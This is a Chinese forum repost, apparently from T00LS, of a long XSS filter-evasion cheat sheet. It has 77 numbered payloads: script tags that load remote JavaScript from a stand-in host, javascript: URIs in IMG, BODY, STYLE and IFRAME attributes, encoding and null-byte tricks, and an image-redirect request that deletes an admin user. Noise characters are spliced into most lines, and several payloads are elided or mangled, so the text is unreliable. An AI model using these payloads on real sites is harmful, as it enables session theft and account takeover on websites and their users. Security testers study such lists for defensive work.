貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。5 B$ b/ Q. o* y" m1 N& |+ b
(1)普通的XSS JavaScript注入
/ O3 P: U, Q W, {+ E5 {<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 z, R# |4 e+ u: e& h+ o$ y(2)IMG标签XSS使用JavaScript命令9 g8 M6 H# Y6 E
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 K e5 g" P; }5 D" \! i# r
(3)IMG标签无分号无引号 A( M3 m0 Y1 I1 @
<IMG SRC=javascript:alert(‘XSS’)>
! z7 s1 i; e0 W8 y(4)IMG标签大小写不敏感2 a4 x- }( |% m3 m! F' ^7 F# h; i
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* ?$ A. k& D! g5 a; {, U(5)HTML编码(必须有分号)6 E. T9 i# _. x( N" I* @
<IMG SRC=javascript:alert(“XSS”)>
+ o- e5 C5 p4 {7 Z0 I b* D8 M(6)修正缺陷IMG标签
2 o, z4 A! y& ?1 I v3 R<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>/ X0 S' r O" z4 p8 H& {) W
0 J/ U8 d6 u* I9 i! ~+ S
* T* u0 r/ `. Q j" i(7)formCharCode标签(计算器)+ g4 R- s7 P1 } z/ E# Q) g
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
% T+ m9 c$ b( o. k(8)UTF-8的Unicode编码(计算器)6 z. t. X0 {- K& p5 }4 \
<IMG SRC=jav..省略..S')>
r5 R5 b7 n. y0 r( Q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
9 O( j, R) Q6 R" b<IMG SRC=jav..省略..S')>7 R7 u0 A6 Y5 c$ f/ S5 Z0 ?; Z4 }
(10)十六进制编码也是没有分号(计算器)) t( G* i8 r* q8 N1 v3 Q$ G! {
<IMG SRC=java..省略..XSS')>
- I9 a6 V. k9 i% ~2 c& T0 A(11)嵌入式标签,将Javascript分开. y% y" }4 b: Q# z& S8 W
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, `+ d. K; i _% R; K6 c(12)嵌入式编码标签,将Javascript分开6 [3 A3 Z Z1 H$ A$ D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, t0 \8 ~2 T5 D7 ]8 Y+ v(13)嵌入式换行符3 ]& X0 A3 I3 K* k& V
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ _# t* b; m4 _" c4 \, u/ g(14)嵌入式回车
: D% [# W4 Y% k, G. Z1 `<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 f- R- E0 @& g$ E# ]' |; A X(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ ]& I0 j9 B# o) u+ I<IMG SRC=”javascript:alert(‘XSS‘)”>. s: q. S1 g/ z# O7 ]# {1 p! [
(16)解决限制字符(要求同页面)
9 l8 p$ Q( X; r0 E<script>z=’document.’</script>* c( U# D3 M1 a
<script>z=z+’write(“‘</script>
: j: V9 Z( m7 T) ?* @* }. M- t8 }<script>z=z+’<script’</script>7 |- W- K5 b* ^3 `& K
<script>z=z+’ src=ht’</script>
( o! ]- y, }# u7 `% ^<script>z=z+’tp://ww’</script>. G% X9 c! C0 F5 [: X$ l, D
<script>z=z+’w.shell’</script>
8 l* x- x, i$ K) k<script>z=z+’.net/1.’</script>
L+ v& x) s4 G0 q. {+ e9 l! R- W<script>z=z+’js></sc’</script>" i* L% t' r& `, `
<script>z=z+’ript>”)’</script>9 l6 P. W0 l3 ?
<script>eval_r(z)</script>2 U% W4 Y7 M9 e5 Y
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
" K# d( i5 j- q5 R' Y7 \. ahttps://www.t00ls.net/viewthread ... table&tid=15267 2/6" B7 j/ E1 J$ {
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
& O/ ~) u" o: L, P9 M(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
- o5 G* c7 v3 B& n( D$ n+ _perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 g* z5 V X. D(19)Spaces和meta前的IMG标签& j4 u% P9 {4 z. x' }. E
<IMG SRC=” javascript:alert(‘XSS’);”> \, i0 L. H/ Y6 j! a& j
(20)Non-alpha-non-digit XSS
/ D0 |: L6 ^8 f9 \<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 N P; J5 K& _ o: j
(21)Non-alpha-non-digit XSS to 2
' M' }- i' i3 D6 }& L<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
; `# S' w( y1 n9 s; e' c(22)Non-alpha-non-digit XSS to 3 ~" z* I, _1 h
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" r% @' G# w$ g1 l" x2 p
(23)双开括号
1 F$ c5 J$ J9 G. k3 g2 y<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 `* ^4 W. Z5 P8 `
(24)无结束脚本标记(仅火狐等浏览器)
* K8 u3 r3 X& r% j<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>8 V3 h; z1 R4 O, E& F5 e
(25)无结束脚本标记2
% G9 ~ e- Q% V I7 ]. Z<SCRIPT SRC=//3w.org/XSS/xss.js>- b9 O% [0 z3 w
(26)半开的HTML/JavaScript XSS0 z8 D! G/ w/ Y
<IMG SRC=”javascript:alert(‘XSS’)”% ~3 ~9 L/ ^" O1 @& T& @
(27)双开角括号
1 O, F$ h9 G1 ?4 L) t6 H<iframe src=http://3w.org/XSS.html <
" `' ~! `, v6 T( @5 M# A6 U(28)无单引号 双引号 分号- S9 E+ z6 q) X, `: {9 e0 M2 J
<SCRIPT>a=/XSS/
7 C S% o/ A& v5 l2 @alert(a.source)</SCRIPT>8 e' m0 k" p: [3 ~
(29)换码过滤的JavaScript
, P+ o. }5 n, T5 @, C\”;alert(‘XSS’);//
+ }$ o! q5 L6 y5 q2 O7 p b* c(30)结束Title标签. ?3 _3 d' F/ a R. W3 f! f$ F
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 t$ |4 M! p8 a$ y- q& z
(31)Input Image& N# b5 s$ b% K% v# J
<INPUT SRC=”javascript:alert(‘XSS’);”>% Z: Q5 H8 I5 U4 M& f
(32)BODY Image
% u1 |% ?; Z0 ^! ]5 Y, I/ D<BODY BACKGROUND=”javascript:alert(‘XSS’)”>2 h/ [( [+ x. [* N3 F1 j# o4 \1 T
(33)BODY标签
: E: ^% z. w4 Y; _! |3 [. P<BODY(‘XSS’)>
- C; r, c5 _4 r5 w5 V(34)IMG Dynsrc' j+ v9 r0 [3 n$ K2 n6 x
<IMG DYNSRC=”javascript:alert(‘XSS’)”> e' ]# G3 z0 h1 e. P
(35)IMG Lowsrc
/ n W0 Z7 j. b- y3 Y; d. k<IMG LOWSRC=”javascript:alert(‘XSS’)”>
/ r6 J, g8 } N& | i- h1 `) E(36)BGSOUND
- \- f' p$ f( C8 \/ m, r; O<BGSOUND SRC=”javascript:alert(‘XSS’);”>0 E2 a( C! l5 ?3 d; Z; Y
(37)STYLE sheet
7 }" U. @2 {' p% i<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
r. f3 E: t3 p5 @3 l(38)远程样式表; s; ^6 J) ^2 a: ~9 O# }! s
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>' a9 [/ S6 j* L
(39)List-style-image(列表式)
( `9 [. o, I+ B4 a. g) I2 y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ n' g% y7 ~$ U9 U1 a5 N" B( `(40)IMG VBscript
1 q2 r9 }7 N! J( ?2 o<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
, l: c2 ^# B, }1 K2 y+ k(41)META链接url
1 a! V% J4 _3 [- f7 k
2 l. K) G* [0 }: t2 g+ {
; o8 Z2 f' i7 O, j: x<META HTTP-EQUIV=”refresh” CONTENT=”0;
/ u) c2 Y4 w; [- K3 f2 ?) _URL=http://;URL=javascript:alert(‘XSS’);”>% ]2 |* G, U2 l; {0 ]) s. C
(42)Iframe$ D2 }# y4 D R8 b
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>1 W' |$ R2 f$ R# w1 V& ]
(43)Frame9 |) g* O4 [! T* F
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
5 h3 c3 F4 p: r6 E( I' C" @https://www.t00ls.net/viewthread ... table&tid=15267 3/6
$ d5 y; x$ v( {5 b/ |, Y% R6 | y(44)Table5 {# U1 E o v. p( Y, {
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 A' F7 O- Q- W" | e4 }! ](45)TD
* F8 E' ]+ D! n<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
, C9 z- ]/ G3 c5 `2 }" ~* a(46)DIV background-image0 @. n0 P/ R. L" O; @" U
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- ]$ v( M% C1 _0 Z9 H$ i(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
) V5 e ~, }3 }" s8&13&12288&65279): m+ F. h( f6 U% t! S$ o% v
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! H( S, i; T+ l8 n: D
(48)DIV expression
/ X% _1 x( y$ H, E( `9 \( M<DIV STYLE=”width: expression_r(alert(‘XSS’));”>6 W5 o. G& |( B
(49)STYLE属性分拆表达; o% I5 h, R6 c6 n5 }. Q# f4 I
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
% U7 s& ?( M$ w f( q(50)匿名STYLE(组成:开角号和一个字母开头): o4 [7 Y% x8 P) G: u @! ?
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: _3 v( M6 {2 p. U5 X2 i1 w
(51)STYLE background-image) _( ~$ w+ M7 D( S4 \1 V5 u; v! N2 A
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
; p: G. H0 X6 g9 oCLASS=XSS></A>
1 E2 P3 D" [1 ^! K4 D w(52)IMG STYLE方式
: X0 q- D! ~1 |0 ?$ @ ^exppression(alert(“XSS”))’>
1 w$ T% X& `& g! d5 B(53)STYLE background* s) S6 W2 {+ f" Y/ c
<STYLE><STYLE( w$ z6 _. J8 |' `" S$ m+ e
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>7 T3 k m4 F; ]- q% F' d* T
(54)BASE
9 ~( ~2 e8 j; T$ F( ~0 L l8 X; y' d<BASE HREF=”javascript:alert(‘XSS’);//”>' m. D/ R5 C: f" `/ i
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% @4 F* \: M/ [& J. T
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>6 C0 w) Y6 N( N5 u. @" L
(56)在flash中使用ActionScrpt可以混进你XSS的代码
* g& |* I9 Y; w( o. j" \7 C* v/ fa=”get”;/ d8 ~! P4 }6 p5 _" J
b=”URL(\”";
% Y$ j6 ^# e% \; K: W% l4 tc=”javascript:”;; W# {8 d& X8 I! O! q3 E
d=”alert(‘XSS’);\”)”;0 f3 P1 C7 d3 w7 _3 `: D9 n
eval_r(a+b+c+d);
J8 g( O6 X7 C) j% `% u, o: v(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" c3 O, a$ A/ T5 @/ J<HTML xmlns:xss>
+ H9 S2 O u# v9 o. @<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>2 F$ h& t3 Y6 K$ n5 q( O8 h
<xss:xss>XSS</xss:xss>' Z. D% Q6 d$ R8 j2 I, l$ @; k
</HTML>6 I6 i* p( }8 m) ^: z7 A
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
3 W% z. S* ]+ ~' {4 }7 [' i1 F<SCRIPT SRC=””></SCRIPT>
. V' z- @1 }# F- {9 I: {; @! h(59)IMG嵌入式命令,可执行任意命令1 ]3 {4 A: h7 o
<IMG SRC=”http://www.XXX.com/a.php?a=b”>2 r2 h( ^1 s" p4 K8 p
(60)IMG嵌入式命令(a.jpg在同服务器)8 r! {1 \: C& n0 [
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
# t3 B: W! S ^; n' b9 P(61)绕符号过滤
' u Z4 ]9 e8 F<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>' i. M& T1 Z! K4 @9 t9 z P
(62)
3 m. x- W# r7 s4 q$ a<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 u, m! P/ u. t* l" L! |5 \. G
(63)
- E/ q; V. r1 Z6 v<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
9 p5 u2 a2 }! {(64)
! p( K0 o1 _8 [% P<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
& r5 Z, b2 b J7 n(65)* m+ o* t* _; R
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ h# X2 Z: W9 [& x* Q(66)12-7-1 T00LS - Powered by Discuz! Board% @0 c; L4 P: N& p5 r
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
0 ?/ e( p! ]* x9 u/ C1 L3 `<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' E. M+ f1 K9 l% |; X
(67)
0 C; o) V5 N. u. d5 L5 e; m" I<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
; P4 |: ~+ @: B# e, H$ U+ m$ q</SCRIPT>. T; i+ T% u+ C$ L1 R: O
(68)URL绕行
4 l3 z# a' D4 b4 l) C$ c<A HREF=”http://127.0.0.1/”>XSS</A>
( }% a0 L+ Y( R$ S8 N8 i7 P(69)URL编码5 ?3 U2 Z4 Z0 @. B+ F
<A HREF=”http://3w.org”>XSS</A>. |5 L c1 Z% i# M) `
(70)IP十进制
+ d/ z8 R1 C& I<A HREF=”http://3232235521″>XSS</A>
$ q+ W- k2 k( g1 z, g) J(71)IP十六进制 }9 `, D# d& m+ b. G" ~+ r9 n
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ j) @( |3 J% |; L% g(72)IP八进制- P- Q& W6 @7 l4 x
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& r9 W% ?5 h+ D) F3 z6 I6 ?(73)混合编码% @% e3 F+ K. A8 o+ S* t
<A HREF=”h( ^$ {# }$ F& G( v- s* m4 V' j
tt p://6 6.000146.0×7.147/”">XSS</A>. [ X5 c& Z2 v5 y0 m
(74)节省[http:]
6 b* S/ K" P- r# t! }! i9 G4 V<A HREF=”//www.google.com/”>XSS</A>
: x$ M; W4 J4 k' }0 ?(75)节省[www]
Y y8 w! W- P" I2 N; _4 I, [<A HREF=”http://google.com/”>XSS</A>* y3 t1 l9 X* A- C' Z
(76)绝对点绝对DNS0 F& [9 W/ @6 _. Q3 m
<A HREF=”http://www.google.com./”>XSS</A>1 q8 s2 R Z4 {6 ]* T5 q c# T! o
(77)javascript链接
2 m/ P, S2 i2 P. @, W5 ]8 A<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
, J& R/ x# X3 S L3 @+ S% e. |0 Z+ i, I7 H* f6 N
原文地址:http://fuzzexp.org/u/0day/?p=14) J4 ?4 o8 G8 H& s. y7 M
! E5 L. b- Y# p. ?) o5 s$ W5 g3 s |
发表于 2013-4-19 19:22:37
收藏
支持
反对